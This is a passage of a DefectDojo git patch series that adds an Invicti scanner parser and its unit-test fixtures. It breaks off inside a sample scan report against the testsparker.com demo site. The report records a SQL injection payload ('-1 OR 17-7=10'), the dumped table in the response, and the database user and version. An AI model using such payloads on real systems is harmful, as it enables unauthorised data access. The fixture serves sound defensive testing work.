From a48829a4eed456e4ad99a9c8d3669a0a976ae3ed Mon Sep 17 00:00:00 2001 From: DefectDojo release bot Date: Mon, 9 Sep 2024 16:09:26 +0000 Subject: [PATCH 01/12] Update versions in application files --- components/package.json | 2 +- helm/defectdojo/Chart.yaml | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/components/package.json b/components/package.json index 8b293de9533..49f5862eecd 100644 --- a/components/package.json +++ b/components/package.json @@ -1,6 +1,6 @@ { "name": "defectdojo", - "version": "2.38.1", + "version": "2.39.0-dev", "license" : "BSD-3-Clause", "private": true, "dependencies": { diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml index 42163033648..61744bdfbd6 100644 --- a/helm/defectdojo/Chart.yaml +++ b/helm/defectdojo/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -appVersion: "2.38.1" +appVersion: "2.39.0-dev" description: A Helm chart for Kubernetes to install DefectDojo name: defectdojo -version: 1.6.149 +version: 1.6.150-dev icon: https://www.defectdojo.org/img/favicon.ico maintainers: - name: madchap From df6c17d573c7231d7fe751262de528cd99f184cc Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:31:01 -0500 Subject: [PATCH 02/12] Product API scan config: Display view scan configs button for all products (#10889) --- dojo/templates/dojo/product.html | 20 +++++++++-------- dojo/templates/dojo/view_product_details.html | 22 ++++++++++--------- 2 files changed, 23 insertions(+), 19 deletions(-) diff --git a/dojo/templates/dojo/product.html b/dojo/templates/dojo/product.html index 1b7f50a73df..0470bd8357a 100644 --- a/dojo/templates/dojo/product.html +++ b/dojo/templates/dojo/product.html @@ -122,18 +122,20 @@

Edit Custom Fields - -
  • - - Add Scan API Configuration - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Edit" %}
  • - - View Scan API Configurations - + + Add Scan API Configuration +
  • {% endif %} +
  • + + View Scan API Configurations + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} diff --git a/dojo/templates/dojo/view_product_details.html b/dojo/templates/dojo/view_product_details.html index 30dd863fc3c..0005dc3fbbc 100644 --- a/dojo/templates/dojo/view_product_details.html +++ b/dojo/templates/dojo/view_product_details.html @@ -41,19 +41,21 @@

    {% trans "Description" %}

    {% trans "Edit Custom Fields" %} - -
  • - - {% trans "Add API Scan Configuration" %} - -
  • + {% endif %} + + {% if prod|has_object_permission:"Product_API_Scan_Configuration_Add" %}
  • - - {% trans "View API Scan Configurations" %} - + + {% trans "Add API Scan Configuration" %} +
  • {% endif %} +
  • + + {% trans "View API Scan Configurations" %} + +
  • {% if system_settings.enable_product_tracking_files %} {% if prod|has_object_permission:"Product_Tracking_Files_Add" %} From 885029c7ccc1fc8225412caf45bc7136a4d5da11 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:31:47 -0500 Subject: [PATCH 03/12] JSON Parsing Errors: Make errors less verbose (#10891) * JSON Parsing Errors: Make errors less verbose * Only intercept when JSON is invalid --- dojo/api_v2/exception_handler.py | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/dojo/api_v2/exception_handler.py b/dojo/api_v2/exception_handler.py index 513c98004b7..8f395026b03 100644 --- a/dojo/api_v2/exception_handler.py +++ b/dojo/api_v2/exception_handler.py @@ -2,6 +2,7 @@ from django.core.exceptions import ValidationError from django.db.models.deletion import RestrictedError +from rest_framework.exceptions import ParseError from rest_framework.response import Response from rest_framework.status import ( HTTP_400_BAD_REQUEST, @@ -20,7 +21,11 @@ def custom_exception_handler(exc, context): # to get the standard error response. response = exception_handler(exc, context) - if isinstance(exc, RestrictedError): + if isinstance(exc, ParseError) and "JSON parse error" in str(exc): + response = Response() + response.status_code = HTTP_400_BAD_REQUEST + response.data = {"message": "JSON request content is malformed"} + elif isinstance(exc, RestrictedError): # An object cannot be deleted because it has dependent objects. response = Response() response.status_code = HTTP_409_CONFLICT From 5d2e728fd49843ce79d78d058faf72a5394f37e4 Mon Sep 17 00:00:00 2001 From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com> Date: Sun, 15 Sep 2024 20:32:41 -0500 Subject: [PATCH 04/12] Add support for Invicti parser through Netsparker (#10894) * Add support for Invicti parser through Netsparker * update settings sha * Rename unit test files * Update docs/content/en/integrations/parsers/file/netsparker.md Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --------- Co-authored-by: Charles Neill <1749665+cneill@users.noreply.github.com> --- .../en/integrations/parsers/file/invicti.md | 9 + .../integrations/parsers/file/netsparker.md | 3 + dojo/settings/.settings.dist.py.sha256sum | 2 +- dojo/settings/settings.dist.py | 2 + dojo/tools/invicti/__init__.py | 0 dojo/tools/invicti/parser.py | 20 + .../scans/invicti/invicti_many_findings.json | 4681 +++++++++++++++++ .../scans/invicti/invicti_one_finding.json | 85 + .../scans/invicti/invicti_zero_finding.json | 10 + unittests/scans/invicti/issue_10311.json | 173 + unittests/scans/invicti/issue_9816.json | 173 + unittests/tools/test_invicti_parser.py | 98 + 12 files changed, 5255 insertions(+), 1 deletion(-) create mode 100644 docs/content/en/integrations/parsers/file/invicti.md create mode 100644 dojo/tools/invicti/__init__.py create mode 100644 dojo/tools/invicti/parser.py create mode 100644 unittests/scans/invicti/invicti_many_findings.json create mode 100644 unittests/scans/invicti/invicti_one_finding.json create mode 100644 unittests/scans/invicti/invicti_zero_finding.json create mode 100644 unittests/scans/invicti/issue_10311.json create mode 100644 unittests/scans/invicti/issue_9816.json create mode 100644 unittests/tools/test_invicti_parser.py diff --git a/docs/content/en/integrations/parsers/file/invicti.md b/docs/content/en/integrations/parsers/file/invicti.md new file mode 100644 index 00000000000..c0ffda1a48e --- /dev/null +++ b/docs/content/en/integrations/parsers/file/invicti.md @@ -0,0 +1,9 @@ +--- +title: "Invicti" +toc_hide: true +--- +Vulnerabilities List - JSON report + +### Sample Scan Data + +Sample Invicti scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/invicti). diff --git a/docs/content/en/integrations/parsers/file/netsparker.md b/docs/content/en/integrations/parsers/file/netsparker.md index 7e46af07b12..0be436e185b 100644 --- a/docs/content/en/integrations/parsers/file/netsparker.md +++ b/docs/content/en/integrations/parsers/file/netsparker.md @@ -4,5 +4,8 @@ toc_hide: true --- Vulnerabilities List - JSON report +[Netsparker has now become Invicti](https://www.invicti.com/blog/news/netsparker-is-now-invicti-signaling-a-new-era-for-modern-appsec/). Please plan to migrate automation scripts to use the [Invicti Scan](../invicti.md) + ### Sample Scan Data + Sample Netsparker scans can be found [here](https://github.com/DefectDojo/django-DefectDojo/tree/master/unittests/scans/netsparker). \ No newline at end of file diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum index 878a104af54..b6e48ee437c 100644 --- a/dojo/settings/.settings.dist.py.sha256sum +++ b/dojo/settings/.settings.dist.py.sha256sum @@ -1 +1 @@ -5adedc433a342d675492b86dc18786f72e167115f9718a397dc9b91c5fdc9c94 +1a74292fc58b2bd05c763c8c126b0b35888e2a6f8ef9ab2588bb6c8589987c9c diff --git a/dojo/settings/settings.dist.py b/dojo/settings/settings.dist.py index ebf0283dd6a..41f0631fa43 100644 --- a/dojo/settings/settings.dist.py +++ b/dojo/settings/settings.dist.py @@ -1279,6 +1279,7 @@ def saml2_attrib_map_format(dict): "AppCheck Web Application Scanner": ["title", "severity"], "Legitify Scan": ["title", "endpoints", "severity"], "ThreatComposer Scan": ["title", "description"], + "Invicti Scan": ["title", "description", "severity"], } # Override the hardcoded settings here via the env var @@ -1503,6 +1504,7 @@ def saml2_attrib_map_format(dict): "AppCheck Web Application Scanner": DEDUPE_ALGO_HASH_CODE, "Legitify Scan": DEDUPE_ALGO_HASH_CODE, "ThreatComposer Scan": DEDUPE_ALGO_UNIQUE_ID_FROM_TOOL_OR_HASH_CODE, + "Invicti Scan": DEDUPE_ALGO_HASH_CODE, } # Override the hardcoded settings here via the env var diff --git a/dojo/tools/invicti/__init__.py b/dojo/tools/invicti/__init__.py new file mode 100644 index 00000000000..e69de29bb2d diff --git a/dojo/tools/invicti/parser.py b/dojo/tools/invicti/parser.py new file mode 100644 index 00000000000..93854d9a2dd --- /dev/null +++ b/dojo/tools/invicti/parser.py @@ -0,0 +1,20 @@ +from dojo.tools.netsparker.parser import NetsparkerParser + + +class InvictiParser(NetsparkerParser): + def get_scan_types(self): + return ["Invicti Scan"] + + def get_label_for_scan_types(self, scan_type): + return "Invicti Scan" + + def get_description_for_scan_types(self, scan_type): + return "Invicti JSON format." + + def get_findings(self, filename, test): + """Extended the NetSparker Parser since the Invicti is the a renamed version of Netsparker. + + If there are deviations from the two report formats in the future, then this + function can be implemented then. + """ + return super().get_findings(filename, test) diff --git a/unittests/scans/invicti/invicti_many_findings.json b/unittests/scans/invicti/invicti_many_findings.json new file mode 100644 index 00000000000..c1a1bef7786 --- /dev/null +++ b/unittests/scans/invicti/invicti_many_findings.json @@ -0,0 +1,4681 @@ +{ + "Generated": "25/06/2021 10:00 AM", + "Target": { + "Duration": "00:12:24.8161163", + "Initiated": "25/06/2021 01:46 AM", + "ScanId": "ee9136920f6243486d12ad5104e2f745", + "Url": "http://php.testsparker.com/" + }, + "Vulnerabilities": [ + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "107", + "Cvss": { + "BaseScore": { + "Severity": 2, + "Type": "Base", + "Value": "5.7" + }, + "EnvironmentalScore": { + "Severity": 2, + "Type": "Environmental", + "Value": "5.5" + }, + "TemporalScore": { + "Severity": 2, + "Type": "Temporal", + "Value": "5.5" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C" + }, + "Cvss31": null, + "Cwe": "16", + "Hipaa": "", + "Owasp": "A5", + "OwaspProactiveControls": "", + "Pci32": "", + "Wasc": "15" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a cookie not marked as HTTPOnly.

    \n

    HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

    ", + "ExploitationSkills": "", + "ExternalReferences": "
    ", + "ExtraInformation": [ + { + "Name": "Identified Cookie(s)", + "Value": "PHPSESSID" + }, + { + "Name": "Cookie Source", + "Value": "HTTP Header" + }, + { + "Name": "Page Type", + "Value": "Login" + } + ], + "FirstSeenDate": "16/06/2021 12:30 PM", + "HttpRequest": { + "Content": "GET /auth/login.php HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nReferer: http://php.testsparker.com/auth/\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nSet-Cookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d; path=/\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nContent-Length: 3061\r\nX-Powered-By: PHP/5.2.6\r\nPragma: no-cache\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nKeep-Alive: timeout=5, max=150\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\nDate: Thu, 24 Jun 2021 22:49:36 GMT\r\nCache-Control: no-store, must-revalidate, no-cache, post-check=0, pre-check=0\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t\t\t\t\t

    Login Area

    \n\t\t\t\t\t

    \n Enter your credentials (admin / admin123456)\n
    \n

    \n Username: \n
    \n Password:  \n\n\n
    \n\t \n
    \n \n
    \n

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\n\n\t\t\t\t
    \n\t\t\t
    \n\t\t
     
    \n\t\t
    \n\t\t\n\t \n\t
    \n\t\t\t
      \n\t\t\t\t
    • \n\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t
      \n\t\t\t\t\t\t
      \n\t\t\t\t\n\t\t\t\t\t
      \n\t\t\t\t\t
       
      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Tags

      \n\t\t\t\t\t

      netsparker xss web-application-security false-positive-free automated-exploitation sql-injection local/remote-file-inclusion

      \n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Inner Pages

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\t\t\t\t\t

      Links

      \n\t\t\t\t\t\n\t\t\t\t
    • \n\t\t\t\t
    • \n\n\t\t\t
    \n\t\t
    \t\t\n\t\t
     
    \n\t
    \n\t
    \n\t
    \n\t\n
    \nv\n
    \n\t\t

    Copyright (c) 2010 testsparker.com. All rights reserved. Design by Free CSS Templates.

    \n\t
    \t\n\n\n", + "Duration": 41.4849, + "StatusCode": 200 + }, + "LookupId": "735f4503-e9eb-4b4c-4306-ad49020a4c4b", + "Impact": "
    During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.
    ", + "KnownVulnerabilities": [], + "LastSeenDate": "25/06/2021 01:52 AM", + "Name": "Cookie Not Marked as HttpOnly", + "ProofOfConcept": "", + "RemedialActions": "
    \n
      \n
    1. See the remedy for solution.
    2. \n
    3. Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)
    4. \n
    \n
    ", + "RemedialProcedure": "
    Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.
    ", + "RemedyReferences": "", + "Severity": "Medium", + "State": "Present", + "Type": "CookieNotMarkedAsHttpOnly", + "Url": "http://php.testsparker.com/auth/login.php" + }, + { + "Certainty": 100, + "Classification": { + "Iso27001": "A.14.2.5", + "Capec": "66", + "Cvss": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cvss31": { + "BaseScore": { + "Severity": 4, + "Type": "Base", + "Value": "10.0" + }, + "EnvironmentalScore": { + "Severity": 4, + "Type": "Environmental", + "Value": "10.0" + }, + "TemporalScore": { + "Severity": 4, + "Type": "Temporal", + "Value": "10.0" + }, + "Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + }, + "Cwe": "89", + "Hipaa": "164.306(a), 164.308(a)", + "Owasp": "A1", + "OwaspProactiveControls": "", + "Pci32": "6.5.1", + "Wasc": "19" + }, + "Confirmed": true, + "Description": "

    Netsparker Enterprise identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

    \n

    This is an extremely common vulnerability and its successful exploitation can have critical implications.

    \n

    Netsparker Enterprise confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Netsparker Enterprise to identify and confirm the SQL injection.

    Proof of Exploit

    Identified Database Name

    sqlibench

    Identified Database User

    root@localhost

    Identified Database Version

    5.0.51b-community-nt-log
    ", + "ExploitationSkills": "
    There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
    ", + "ExternalReferences": "
    ", + "ExtraInformation": [], + "FirstSeenDate": "16/06/2021 12:38 PM", + "HttpRequest": { + "Content": "GET /artist.php?id=-1%20OR%2017-7%3d10 HTTP/1.1\r\nHost: php.testsparker.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\nAccept-Language: en-us,en;q=0.5\r\nCache-Control: no-cache\r\nCookie: PHPSESSID=e52a07f0fe53c0294ae211bc4481332d\r\nReferer: http://php.testsparker.com/process.php?file=Generics/index.nsp\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36\r\nX-Scanner: Netsparker Enterprise\r\n\r\n", + "Method": "GET", + "Parameters": [ + { + "Name": "id", + "Type": "Querystring", + "Value": "-1 OR 17-7=10", + "Vulnerable": true + } + ] + }, + "HttpResponse": { + "Content": "HTTP/1.1 200 OK\r\nServer: Apache/2.2.8 (Win32) PHP/5.2.6\r\nX-Powered-By: PHP/5.2.6\r\nConnection: Keep-Alive\r\nKeep-Alive: timeout=5, max=150\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nDate: Thu, 24 Jun 2021 22:51:27 GMT\r\n\r\n\n\n\n\n\n\n\nNetsparker Test Web Site - PHP\n\n\n\n
    \n \n\t
    \n\t\t\n\t
    \n\t\n\t
    \n\n\t
    \n\t\t
    \n\t
    \n\t
    \n\t\t
    \n\t\t\t
    \n\t\t\t\t

    Artist Service

    \n\n\t\t\t\t
     
    \n\t\t\t\t
    \n\t\t\t\t\t

    \n \n

    Results: -1 OR 17-7=10


    \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
    IDNameSURNAMECREATION DATE
    2 NICK WAHLBERG 2006-02-15 04:34:33
    3 ED CHASE 2006-02-15 04:34:33
    4 JENNIFER DAVIS 2006-02-15 04:34:33
    5 JOHNNY LOLLOBRIGIDA 2006-02-15 04:34:33
    6 BETTE NICHOLSON 2006-02-15 04:34:33
    7 GRACE MOSTEL 2006-02-15 04:34:33
    8 MATTHEW JOHANSSON 2006-02-15 04:34:33
    9 JOE SWANK 2006-02-15 04:34:33
    10 CHRISTIAN GABLE 2006-02-15 04:34:33
    11 ZERO CAGE 2006-02-15 04:34:33
    12 KARL BERRY 2006-02-15 04:34:33
    13 UMA WOOD 2006-02-15 04:34:33
    14 VIVIEN BERGEN 2006-02-15 04:34:33
    15 CUBA OLIVIER 2006-02-15 04:34:33
    16 FRED COSTNER 2012-03-13 12:14:54 22
    17 HELEN VOIGHT 2012-03-13 12:14:54 22
    18 DAN TORN 2012-03-13 12:14:54 22
    19 BOB FAWCETT 2012-03-13 12:14:54 22
    20 LUCILLE TRACY 2012-03-13 12:14:54 22
    21 KIRSTEN PALTROW 2012-03-13 12:14:54 22
    22 ELVIS MARX 2012-03-13 12:14:54 22
    23 SANDRA KILMER 2012-03-13 12:14:54 22
    24 CAMERON STREEP 2012-03-13 12:14:54 22
    25 KEVIN BLOOM 2012-03-13 12:14:54 22
    26 RIP CRAWFORD 2012-03-13 12:14:54 22
    27 JULIA MCQUEEN 2012-03-13 12:14:54 22
    28 WOODY HOFFMAN 2012-03-13 12:14:54 22
    29 ALEC WAYNE 2012-03-13 12:14:54 22
    30 SANDRA PECK 2012-03-13 12:14:54 22
    31 SISSY SOBIESKI 2012-03-13 12:14:54 22
    32 TIM HACKMAN 2012-03-13 12:14:54 22
    33 MILLA PECK 2012-03-13 12:14:54 22
    34 AUDREY OLIVIER 2012-03-13 12:14:54 22
    35 JUDY DEAN 2012-03-13 12:14:54 22
    36 BURT DUKAKIS 2012-03-13 12:14:54 22
    37 VAL BOLGER 2012-03-13 12:14:54 22
    38 TOM MCKELLEN 2012-03-13 12:14:54 22
    39 GOLDIE BRODY 2012-03-13 12:14:54 22
    40 JOHNNY CAGE 2012-03-13 12:14:54 22
    41 JODIE DEGENERES 2012-03-13 12:14:54 22
    42 TOM MIRANDA 2012-03-13 12:14:54 22
    43 KIRK JOVOVICH 2012-03-13 12:14:54 22
    44 NICK STALLONE 2012-03-13 12:14:54 22
    45 REESE KILMER 2012-03-13 12:14:54 22
    46 PARKER GOLDBERG 2012-03-13 12:14:54 22
    47 JULIA BARRYMORE 2012-03-13 12:14:54 22
    48 FRANCES DAY-LEWIS 2012-03-13 12:14:54 22
    49 ANNE CRONYN 2012-03-13 12:14:54 22
    50 NATALIE HOPKINS 2012-03-13 12:14:54 22
    51 GARY PHOENIX 2012-03-13 12:14:54 22
    52 CARMEN HUNT 2012-03-13 12:14:54 22
    53 MENA TEMPLE 2012-03-13 12:14:54 22
    54 PENELOPE PINKETT 2012-03-13 12:14:54 22
    55 FAY KILMER 2012-03-13 12:14:54 22
    56 DAN HARRIS 2012-03-13 12:14:54 22
    57 JUDE CRUISE 2012-03-13 12:14:54 22
    58 CHRISTIAN AKROYD 2012-03-13 12:14:54 22
    59 DUSTIN TAUTOU 2012-03-13 12:14:54 22
    60 HENRY BERRY 2012-03-13 12:14:54 22
    61 CHRISTIAN NEESON 2012-03-13 12:14:54 22
    62 JAYNE NEESON 2012-03-13 12:14:54 22
    63 CAMERON WRAY 2012-03-13 12:14:54 22
    64 RAY JOHANSSON 2012-03-13 12:14:54 22
    65 ANGELA HUDSON 2012-03-13 12:14:54 22
    66 MARY TANDY 2012-03-13 12:14:54 22
    67 JESSICA BAILEY 2012-03-13 12:14:54 22
    68 RIP WINSLET 2012-03-13 12:14:54 22
    69 KENNETH PALTROW 2012-03-13 12:14:54 22
    70 MICHELLE MCCONAUGHEY 2012-03-13 12:14:54 22
    71 ADAM GRANT 2012-03-13 12:14:54 22
    72 SEAN WILLIAMS 2012-03-13 12:14:54 22
    73 GARY PENN 2012-03-13 12:14:54 22
    74 MILLA KEITEL 2012-03-13 12:14:54 22
    75 BURT POSEY 2012-03-13 12:14:54 22
    76 ANGELINA ASTAIRE 2012-03-13 12:14:54 22
    77 CARY MCCONAUGHEY 2012-03-13 12:14:54 22
    78 GROUCHO SINATRA 2012-03-13 12:14:54 22
    79 MAE HOFFMAN 2012-03-13 12:14:54 22
    80 RALPH CRUZ 2012-03-13 12:14:54 22
    81 SCARLETT DAMON 2012-03-13 12:14:54 22
    82 WOODY JOLIE 2012-03-13 12:14:54 22
    83 BEN WILLIS 2012-03-13 12:14:54 22
    84 JAMES PITT 2012-03-13 12:14:54 22
    85 MINNIE ZELLWEGER 2012-03-13 12:14:54 22
    86 GREG CHAPLIN 2012-03-13 12:14:54 22
    87 SPENCER PECK 2012-03-13 12:14:54 22
    88 KENNETH PESCI 2012-03-13 12:14:54 22
    89 CHARLIZE DENCH 2012-03-13 12:14:54 22
    90 SEAN GUINESS 2012-03-13 12:14:54 22
    91 CHRISTOPHER BERRY 2012-03-13 12:14:54 22
    92 KIRSTEN AKROYD 2012-03-13 12:14:54 22
    93 ELLEN PRESLEY 2012-03-13 12:14:54 22
    94 KENNETH TORN 2012-03-13 12:14:54 22
    95 DARYL WAHLBERG 2012-03-13 12:14:54 22
    96 GENE WILLIS 2012-03-13 12:14:54 22
    97 MEG HAWKE 2012-03-13 12:14:54 22
    98 CHRIS BRIDGES 2012-03-13 12:14:54 22
    99 JIM MOSTEL 2012-03-13 12:14:54 22
    100 SPENCER DEPP 2012-03-13 12:14:54 22
    101 SUSAN DAVIS 2012-03-13 12:14:54 22
    102 WALTER TORN 2012-03-13 12:14:54 22
    103 MATTHEW LEIGH 2012-03-13 12:14:54 22
    104 PENELOPE CRONYN 2012-03-13 12:14:54 22
    105 SIDNEY CROWE 2012-03-13 12:14:54 22
    106 GROUCHO DUNST 2012-03-13 12:14:54 22
    107 GINA DEGENERES 2012-03-13 12:14:54 22
